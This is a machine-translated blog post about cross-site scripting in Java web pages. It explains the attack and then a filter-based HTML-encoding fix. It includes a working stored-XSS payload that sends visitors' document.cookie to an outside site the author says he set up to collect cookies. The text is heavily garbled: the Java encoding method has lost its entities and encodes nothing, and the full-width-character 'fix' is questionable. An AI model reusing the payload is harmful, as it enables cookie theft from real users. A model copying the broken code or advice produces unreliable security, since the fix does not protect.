Java XSS attacks (cross-site scripting attacks)

Discover problems

Recently our server has been frequently hacked, it is really a headache ah, a lesson from the pain, carefully think about why we will be attacked, it is certainly our code has loopholes ah, then how we detect the vulnerability of our site, the first comparison of the public is through the 360 Site Security Detection (http:// webscan.360.cn/), but found this too simple, not professional, then we come to a professional Acunetix Web vulnerability Scanner, this software is charged, but I am a poor so do not buy, please forgive me. If you are very poor please download trial here, Link: http://pan.baidu.com/s/1qWr1maC password: Bvon.
After the scan, found that the main vulnerability of the site XSS CSS Cross SITESCRIPT,XSS, also known as CSS, the full cross sitescript, multi-site scripting attacks, is a common vulnerability in web programs, XSS is passive and used for the client's attack mode, So it is easy to ignore its harmfulness. The principle is that an attacker would enter (pass in) malicious HTML code into a Web site with an XSS vulnerability, and the HTML code would be executed automatically when other users browsed the site for the purpose of the attack. For example, theft of user cookies, destruction of page structure, redirection to other websites, etc. XSS attacks are similar to SQL injection attacks. It seems that the harm is very big, we must mend it. So how to fix it, first of all we know how he attacked:

<%@ page language= "java" contenttype= "text/html; Charset=utf-8 "pageencoding=" UTF-8 "%><! Doctypehtmlpublic "-//w3c//dtd HTML 4.01 transitional//en" "Http://www.w3.org/TR/html4/loose.dtd" >
We directly enter <script>window.open ("www.jwdstef.com?param=" +document.cookie) </script>, and when the user views this page, Will request www.jwdstef.com This site, this site is my own set up specifically to collect user cookies, so I stole the user's cookie. 
Patching XSS

We know how to attack, we can find a way to repair, we first want to filter the special word such as:<> "", "the space, etc., this method we call him HTML encode

 
 

  
  
 
   
 
    
Less-than character (<)
 
    
&lt;
 
   
 
   
 
    
Greater-than character (>)
 
    
&gt;
 
   
 
   
 
    
Ampersand character (&)
 
    
&amp;
 
   
 
   
 
    
Double-quote character (")
 
    
&quot;
 
   
 
   
 
    
Space character ()
 
    
&nbsp;
 
   
 
   
 
    
Any ASCII code character whose code was Greater-than or equal to 0x80
 
    
&#<number>, where <number> is the ASCII character value.
 
   
 
  
 
 
For example, user input: <script>window.location.href= "http://www.jwdstef.com"; </script> after saving, the final storage will be:&lt; Script&gt;window.location.href=&quot;http://www.jwdstef.com&quot;&lt;/script&gt; When presented, the browser converts these characters into text content instead of an executable code.
The HTML Encode implementation method is simple and can be implemented by filters, regardless of the framework (SERVLET,STRUTS2,SPRINGMVC) that you use for the project, which can be implemented by using filter.
private static String HtmlEncode (char c) {    switch (c) {case       ' & ':           return ' & ';       Case ' < ':           return ' < ';       Case ' > ':           return ' > ';       Case ' ':           return ' "";       Case ':           return ' ";       Default:           return C + "";    }/** HTML encode conversion of incoming string str */public static string HtmlEncode (String str) {    if (str ==null | | str.trim (). Equals (""))   return str;    StringBuilder Encodestrbuilder = new StringBuilder ();    for (int i = 0, Len = str.length (), i < Len; i++) {       encodestrbuilder.append (HtmlEncode (Str.charat (i)));    }    return encodestrbuilder.tostring ();}
This method is not elegant enough, why say so, because we turn him, the page will have to usefn:excapexml ("fff") turn back, trouble, then we come to a bunker method,
Special characters are all converted to full-width special characters (Java full-width half-width conversion) .... Haha, so the front desk does not have to turn, this method carefully think really elegant enough .....

This allows us to complete the patch of the bug with minimal effort. In order to prevent hackers from using other methods to attack our site, we have to invite the master for our Code and server

And after this lesson, we also force the requirement that the code must precede the
 < /span>  
_oo8oo_//o8888888o// 88 ". "88//(| -_- |) 0\ =/0//___/' = = = ' \___//.     ' \\|  |// './/                            / \\||| :  ||| // //                           / _||||| -:- |||||   _ //                          | |   \\\  -  /// | |//                          |  \_|  ''\---/''  |_/ |//                          \  .-\__  '-'  __/-. ///                        ___'.  .' /--.--\  '. .' ___//                     .""  ' < '. ___\_<|>_/___. '   > ' ".//| |: '-\ '.: ' \ _/':. '/-': | |//\ '-. \_ __\ /__ _/   .-` /  ///                =====`-.____`.___ \_____/ ___.`____.-`=====//                                  `                        =---=`// // //               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~////  Buddha bless never downtime/no bugs 

Haha, the back is a joke, we don't take it seriously.



Java XSS attacks (cross-site scripting attacks)